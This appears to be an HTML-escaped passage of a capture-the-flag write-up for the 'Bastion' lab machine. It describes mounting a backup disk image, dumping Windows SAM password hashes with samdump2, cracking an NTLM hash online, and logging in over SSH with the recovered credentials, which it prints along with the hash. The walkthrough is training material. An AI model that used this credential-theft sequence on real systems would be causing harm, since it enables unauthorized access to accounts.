&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- It uses &lt;b&gt;libguestfs&lt;/b&gt; for access to the guest filesystem, and &lt;b&gt;FUSE&lt;/b&gt; (the &quot;filesystem in userspace&quot;) to make it appear as a mountable device.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;http://libguestfs.org/guestmount.1.html&quot;&gt;http://libguestfs.org/guestmount.1.html&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Installing &lt;b&gt;libguestfs-tools&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSEBotHRlSgpYuIDUR4gS9kHiV3uIl6XbJmjhibECJ0NfIv-0Z5COhqckotWbN7UX-9wW2y92iA3NBoqdcvi_H6KjXoWq_t7kQaZQ6gLCdvq1KzFiQkcY8Rn1q7S8HGv4ZW8-3eSLiRZ6w/s1600/screenshot.56.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSEBotHRlSgpYuIDUR4gS9kHiV3uIl6XbJmjhibECJ0NfIv-0Z5COhqckotWbN7UX-9wW2y92iA3NBoqdcvi_H6KjXoWq_t7kQaZQ6gLCdvq1KzFiQkcY8Rn1q7S8HGv4ZW8-3eSLiRZ6w/s1600/screenshot.56.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Creating folder &lt;b&gt;/vhd2&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEQVNmpzoJQmjLVHIwJGSJaRppR6yZ0HGfIgYAUwOEViBRDIjq1524w7CPUggziJNiGPxv1C7UXzxRVg872boeKv4XcsBl36tUYSp6amSdvHqNwYs5fssIBzw1JGlzkiTyEwgrzk_lcYJR/s1600/screenshot.58.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEQVNmpzoJQmjLVHIwJGSJaRppR6yZ0HGfIgYAUwOEViBRDIjq1524w7CPUggziJNiGPxv1C7UXzxRVg872boeKv4XcsBl36tUYSp6amSdvHqNwYs5fssIBzw1JGlzkiTyEwgrzk_lcYJR/s400/screenshot.58.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Using &lt;b&gt;guestmount&lt;/b&gt; to mount the 2nd &lt;b&gt;.vhd&lt;/b&gt; disk on local folder &lt;b&gt;/mnt/vhd2&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5L1aeN1rC8lDKI5IqSVriYnoZExC1wI6sXN5RPmPRFNBVdUfPUWmbu7XjMdKDdaoYy96wDIzXyerrCc2oPP3pRQVuoqSI7xvQyozFLwfoi6fWcnF7YwqrHR4TuQ0iViFPh7HEK58jDS34/s1600/screenshot.57.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5L1aeN1rC8lDKI5IqSVriYnoZExC1wI6sXN5RPmPRFNBVdUfPUWmbu7XjMdKDdaoYy96wDIzXyerrCc2oPP3pRQVuoqSI7xvQyozFLwfoi6fWcnF7YwqrHR4TuQ0iViFPh7HEK58jDS34/s1600/screenshot.57.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The mounting process is successful, so now we have access to the whole backup disk&amp;nbsp;&lt;b&gt;.vhd2&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5K6LvHdPxHkjAaD5VMuaLG9eXNmWsYROACEGqSbDqLnEm9zdmBhKucrP583I-NXTIr2Vi4OhyphenhyphenoasXFgQQQJyzLsLU-JsSHa0aVB_WT17e9TM10mxztqjKDlVph2k0Evv1d_Pddp705daB/s1600/screenshot.59.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5K6LvHdPxHkjAaD5VMuaLG9eXNmWsYROACEGqSbDqLnEm9zdmBhKucrP583I-NXTIr2Vi4OhyphenhyphenoasXFgQQQJyzLsLU-JsSHa0aVB_WT17e9TM10mxztqjKDlVph2k0Evv1d_Pddp705daB/s400/screenshot.59.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiRG4RFP0WPcovheuhGGYArYCW7QS1Ni8iXNyDTDWWr7b3bEYXJ8FBti2_yh71SoyWckY6QlntPPt6VMk3kYBY9HA7gsA_byFMXBUiTCTcXJ6YeG3JtuZX8qQpw2fMdHmgI0uqi0IA4hgj/s1600/screenshot.60.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiRG4RFP0WPcovheuhGGYArYCW7QS1Ni8iXNyDTDWWr7b3bEYXJ8FBti2_yh71SoyWckY6QlntPPt6VMk3kYBY9HA7gsA_byFMXBUiTCTcXJ6YeG3JtuZX8qQpw2fMdHmgI0uqi0IA4hgj/s1600/screenshot.60.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;3.2 - Getting the Security Account Manager (SAM)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The &lt;b&gt;Security Account Manager (SAM)&lt;/b&gt; is the database where Windows systems store users&#39;s passwords.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;Bastion&lt;/b&gt; is a &lt;b&gt;Windows Server 2016&lt;/b&gt; so it uses &lt;b&gt;NTLM&lt;/b&gt; hashes for sure.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- This file can be found in &lt;b&gt;%SystemRoot%/System32/config/SAM&lt;/b&gt; and is mounted on &lt;b&gt;HKLM/SAM:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg86ciILU3GLIvZLGYyADChRfOKXoCjpOvMDIMOZ4487te4Pzu3LMn5ta5CED4x7Y4J_KEGgTWPHew8UK4vOa4ejGCCaAca8touszwr53g6sgKVm2O0JKk-Q0IjXMPIYwfeVtN6xdm7duLM/s1600/screenshot.61.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg86ciILU3GLIvZLGYyADChRfOKXoCjpOvMDIMOZ4487te4Pzu3LMn5ta5CED4x7Y4J_KEGgTWPHew8UK4vOa4ejGCCaAca8touszwr53g6sgKVm2O0JKk-Q0IjXMPIYwfeVtN6xdm7duLM/s1600/screenshot.61.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Using &lt;b&gt;samdump2&lt;/b&gt; to retrieve hashes from &lt;b&gt;Bastion&lt;/b&gt;&#39;s users:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_SpCAMJP_see7ej8ebrJDGN7iSIn8nayRG1PPgon5GBwW9LjEebyIb6ialryeb7jQnB1cAWT1cp-YHsyAY0aZfG5n6-0_qYAOJ-eD4lL3yJmPiurhRJ-V8CXuNvC55STENfHYgwLpZJzl/s1600/screenshot.65.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;482&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_SpCAMJP_see7ej8ebrJDGN7iSIn8nayRG1PPgon5GBwW9LjEebyIb6ialryeb7jQnB1cAWT1cp-YHsyAY0aZfG5n6-0_qYAOJ-eD4lL3yJmPiurhRJ-V8CXuNvC55STENfHYgwLpZJzl/s640/screenshot.65.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVyuAF-CfMG-7H47PnFYgOk1ZMCKh7Abxq3-A1AOkXNkk5PIo9gW1lKIcK3ZstJe0UAOfOUWuf6tIVp9kGP8GNfdnrjQn5bVlR50ya9WpfHnroLZFn3UpRd0Ldn5fIdHerpRvfB4BybzTm/s1600/screenshot.62.jpg&quot; imageanchor=&quot;1&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVyuAF-CfMG-7H47PnFYgOk1ZMCKh7Abxq3-A1AOkXNkk5PIo9gW1lKIcK3ZstJe0UAOfOUWuf6tIVp9kGP8GNfdnrjQn5bVlR50ya9WpfHnroLZFn3UpRd0Ldn5fIdHerpRvfB4BybzTm/s1600/screenshot.62.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZluPv6PATXybaUaI2cQXaKytTSlboW9vn848YDbP5waREpwHagHe_fXC6HdUBJ3LxTa3tVi5ZcDB_eddI1yOFTd-QryFu_1NFYs5BHu8ppwHQHlLy2s352ZGOowrN0CSLjBwMZq-G4tW7/s1600/screenshot.64.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZluPv6PATXybaUaI2cQXaKytTSlboW9vn848YDbP5waREpwHagHe_fXC6HdUBJ3LxTa3tVi5ZcDB_eddI1yOFTd-QryFu_1NFYs5BHu8ppwHQHlLy2s352ZGOowrN0CSLjBwMZq-G4tW7/s1600/screenshot.64.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Accounts&amp;nbsp;&lt;b&gt;Administrator&lt;/b&gt;&amp;nbsp;and&amp;nbsp;&lt;b&gt;Guest&lt;/b&gt;&amp;nbsp;are disabled, so let&#39;s write down hash for user&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;L4mpje:&lt;/b&gt;&lt;br /&gt;
&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/b&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;26112010952d963c8dc4217daec986d9&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;
&lt;/span&gt;&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;3.3 - Cracking the NTLM h&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;ash&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;Hashkiller&lt;/b&gt; works online to decrypt the NTLM hash found in previous point:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEa0A7B-9R3BhtDS-xncOhhjref4yjSavbu2-snhDjubYeLtMA-HHYxNADyV4VQc9nUXWAE4ML91iVp_qkvQ-mhiREbhy0ix1wXHvWJngDGB753zNBv-54ZSFFbe9Te-qLfr8XfpVUebVr/s1600/screenshot.23.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEa0A7B-9R3BhtDS-xncOhhjref4yjSavbu2-snhDjubYeLtMA-HHYxNADyV4VQc9nUXWAE4ML91iVp_qkvQ-mhiREbhy0ix1wXHvWJngDGB753zNBv-54ZSFFbe9Te-qLfr8XfpVUebVr/s1600/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEY2QWaRDRGSaLtj4y7AhVa-LMj1-0h5kuCebP5LfXQ_kWQYoVfrjWHkSQEbOSfwneoxo-pR5e8eWIh0rDk8rn6egkUaAnzSZ1dnj9rPQRODT-hRZM19rylW-TWXaNUI0rkEkoqcnAbEHS/s1600/screenshot.24.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEY2QWaRDRGSaLtj4y7AhVa-LMj1-0h5kuCebP5LfXQ_kWQYoVfrjWHkSQEbOSfwneoxo-pR5e8eWIh0rDk8rn6egkUaAnzSZ1dnj9rPQRODT-hRZM19rylW-TWXaNUI0rkEkoqcnAbEHS/s1600/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;3.4 - Getting a remote shell&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Now, using credentials &lt;b&gt;L4mpje:bureaulampje&lt;/b&gt; we have an &lt;b&gt;SSH&lt;/b&gt; connection and a remote shell:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPRMLWYXf5sVERgycMMjELV127GC1GXqDqjJ_KWfeel6WV-oP0NGdUgP_-dl3lU_ACOI899NU4QlRvnQQkpUZdR81wMYx7nP6Oj8X5tBaOFu7x83QttsLeli7Rp6PIsfRkuC997KRNDC98/s1600/screenshot.25.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPRMLWYXf5sVERgycMMjELV127GC1GXqDqjJ_KWfeel6WV-oP0NGdUgP_-dl3lU_ACOI899NU4QlRvnQQkpUZdR81wMYx7nP6Oj8X5tBaOFu7x83QttsLeli7Rp6PIsfRkuC997KRNDC98/s1600/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHZE4plxYgiewYAcpGfI3vO-Wgr6lgqVzDLj5RK1ncmPJjBr5BQ46X4bap8lCnh4SXFecqqwU0oW48CBKPl5k_ttCkc7T6DTjkhlgSfFPy0Q_22IVoOHGD-ts1higAiK_UVJhNVLYKQ_Xe/s1600/screenshot.26.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHZE4plxYgiewYAcpGfI3vO-Wgr6lgqVzDLj5RK1ncmPJjBr5BQ46X4bap8lCnh4SXFecqqwU0oW48CBKPl5k_ttCkc7T6DTjkhlgSfFPy0Q_22IVoOHGD-ts1higAiK_UVJhNVLYKQ_Xe/s1600/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP8P5IjwzcJu6-9Xrq0HcxZlxjURN41C_MoyW0OukEZkjRv9r_Hd7SjQ1RE_E4fNdq7oPgY0690Mow8RdklP3vTbrMmXoeOa3uHdUyKSJOz-f2ITrXO0Jjhjusgtroc0bGykSmG0UEasG6/s1600/screenshot.29.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP8P5IjwzcJu6-9Xrq0HcxZlxjURN41C_MoyW0OukEZkjRv9r_Hd7SjQ1RE_E4fNdq7oPgY0690Mow8RdklP3vTbrMmXoeOa3uHdUyKSJOz-f2ITrXO0Jjhjusgtroc0bGykSmG0UEasG6/s1600/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;4 - CAPTURING THE 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading &lt;b&gt;user.txt&lt;/b&gt; from user &lt;b&gt;l4mpje&lt;/b&gt;&#39;s&lt;b&gt; Desktop&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
